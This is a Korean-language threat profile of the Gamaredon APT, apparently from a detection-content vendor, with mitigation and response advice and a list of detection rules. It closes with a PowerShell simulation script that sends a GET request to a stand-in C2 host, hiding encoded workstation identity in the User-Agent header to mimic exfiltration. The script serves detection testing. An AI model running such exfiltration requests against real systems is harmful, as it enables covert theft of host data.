Gamaredon (Primitive Bear) APT 프로필 및 MITRE ATT&CK 매핑
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
Gamaredon은 2013년부터 활동 중인 러시아 중심의 고급 지속 위협 그룹으로, 러시아 FSB에 귀속됩니다. 이 그룹은 사이버 스파이와 데이터 절취에 중점을 두고 있으며, 주로 우크라이나 정부 및 방위 조직을 대상으로 합니다. 그들의 작전은 GammaLoad 및 GammaSteel과 같은 맞춤형 악성코드 계열에 의존하며, 다양한 난독화 및 지속성 방법으로 지원됩니다.
조사
이 보고서는 2013년부터 2025년에 이르는 캠페인을 검토하며, Cloudflare Workers, Telegram API 사용 및 WinRAR 취약성 악용으로의 그룹 이동을 강조합니다. 또한 Gamaredon의 VPScript 드롭퍼에서 더 발전된 PowerShell 기반 정보 탈취 및 모바일 스파이웨어로의 발전을 추적합니다.
완화
추천되는 완화 조치는 WinRAR를 패치하여 CVE-2025-8088 을 해결하고 의심스러운 PowerShell 실행을 모니터링하는 것입니다. 조직은 또한 이동식 미디어에 대한 엄격한 통제를 시행하고, 비정상적인 예약 작업을 주시하며, 시뮬레이션 및 테스트 플랫폼을 통해 Gamaredon의 알려진 TTPs에 대한 방어 통제를 검증해야 합니다.
응답
Gamaredon 활동이 감지되면 응답자들은 특히 GammaSteel이나 Ptero* 악성코드 활동을 보이는 시스템의 영향을 받은 호스트를 즉시 격리해야 합니다. 조사자들은 레지스트리 기반 지속성을 검토하고 비인가 항목을 위한 예약된 작업을 검사하며, Cloudflare 또는 Telegram 관련 인프라에 대한 의심스러운 외부 트래픽을 광범위하게 수색해야 합니다.
공격 흐름
탐지
Powershell에서 호출된 의심스러운 .NET 메서드 (powershell을 통해)
보기
가능한 지속성 지점 [ASEPs – Software/NTUSER 하이브] (registry_event 통해)
보기
Rclone 툴을 통한 가능한 데이터 탈취 (cmdline을 통해)
보기
Powershell을 통해 다운로드 또는 업로드 (cmdline을 통해)
보기
Powershell 명령줄에서 호출된 의심스러운 .NET 클래스/메서드 (process_creation을 통해)
보기
Schtasks가 의심스러운 디렉터리/바이너리/스크립트를 가리킴 (cmdline을 통해)
보기
LOLBAS WScript / CScript (process_creation을 통해)
보기
관련 명령어 탐지를 통해 의심스러운 LOLBAS MSHTA 방어 회피 행동 (process_creation을 통해)
보기
자동 시작 위치에 있는 의심스러운 파일/스크립트 (file_event을 통해)
보기
가능한 CVE-2025-8088 / CVE-2025-6218 (WinRAR 취약성) 악용 시도 (file_event을 통해)
보기
가능한 동적 DNS 서비스에 연결됨 (dns를 통해)
보기
Gamaredon GammaLoad GET 요청 감지 및 User-Agent 탈취 [Windows 네트워크 연결]
보기
LNK 바로가기를 통한 PowerShell 다운로드, 난독화 [Windows Powershell]
보기
## 시뮬레이션 실행
전제조건: 원격 측정 및 기준선의 사전 점검을 통과해야 합니다.
이유: 이 섹션은 탐지 규칙을 촉발하도록 설계된 적대적 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령 및 서술은 반드시 식별된 TTP를 직접 반영해야 하며, 탐지 논리에서 예상하는 정확한 원격 측정을 생성해야 합니다. 추상적이거나 관련 없는 예시는 오진을 초래할 것입니다.
-
공격 서사 및 명령: 적수가
WORKSTATION01에 발판을 마련했습니다. 전통적인 파일 기반 DLP를 촉발시키지 않고 시스템 메타데이터(예: 호스트 이름 또는 사용자 이름)를 유출하기 위해 그들은 GammaLoad 악성코드의 맞춤 구현을 사용합니다. 이 악성코드는 원격 명령 및 제어(C2) 서버에 HTTP GET 요청을 수행합니다. URI나 POST 본문에 데이터를 삽입하는 대신, 악성코드는 인코딩된 워크스테이션 신원을User-Agent헤더에 포함합니다:::WORKSTATION01_encoded_data. 이를 통해 데이터는 간단한 URL 필터링을 우회할 수 있으며 일반적인 웹 트래픽에 숨겨진 상태로 남아 있습니다. -
회귀 테스트 스크립트: 이 스크립트는 규칙 트리거에 필요한 악의적인 User-Agent 문자열을 포함한 특정 HTTP GET 요청을 시뮬레이션하기 위해 PowerShell을 사용합니다.
# GammaLoad User-Agent 탈취 시뮬레이션 $TargetUrl = "http://example-c2-server.com/api/check" $MaliciousUA = "::WORKSTATION01_V3_DATA_EXFIL_TEST" Write-Host "[*] 시뮬레이션 시작: 악성 User-Agent를 사용하여 GET 요청 전송..." -ForegroundColor Cyan try { $response = Invoke-WebRequest -Uri $TargetUrl -UserAgent $MaliciousUA -Method GET Write-Host "[+] 요청이 성공적으로 전송됨. SIEM에서 경고 확인." -ForegroundColor Green } catch { # URL이 존재하지 않는 경우 연결 오류 예상, # 하지만 User-Agent는 여전히 프록시에 의해 기록됩니다. Write-Host "[!] 요청 시도됨 (참고: URL이 유효하지 않은 경우 연결 오류가 예상되지만, 프록시 로그는 여전히 UA를 캡처해야 함)." -ForegroundColor Yellow } -
정리 명령: 이 시뮬레이션은 일시적인 네트워크 트래픽만 생성하며 시스템 파일이나 레지스트리 키를 수정하지 않으므로 정리가 필요하지 않습니다.
# 시스템 변경이 없었습니다. 시뮬레이션 완료. Write-Host "[*] 정리: 호스트에 남아있는 흔적 없음." -ForegroundColor Green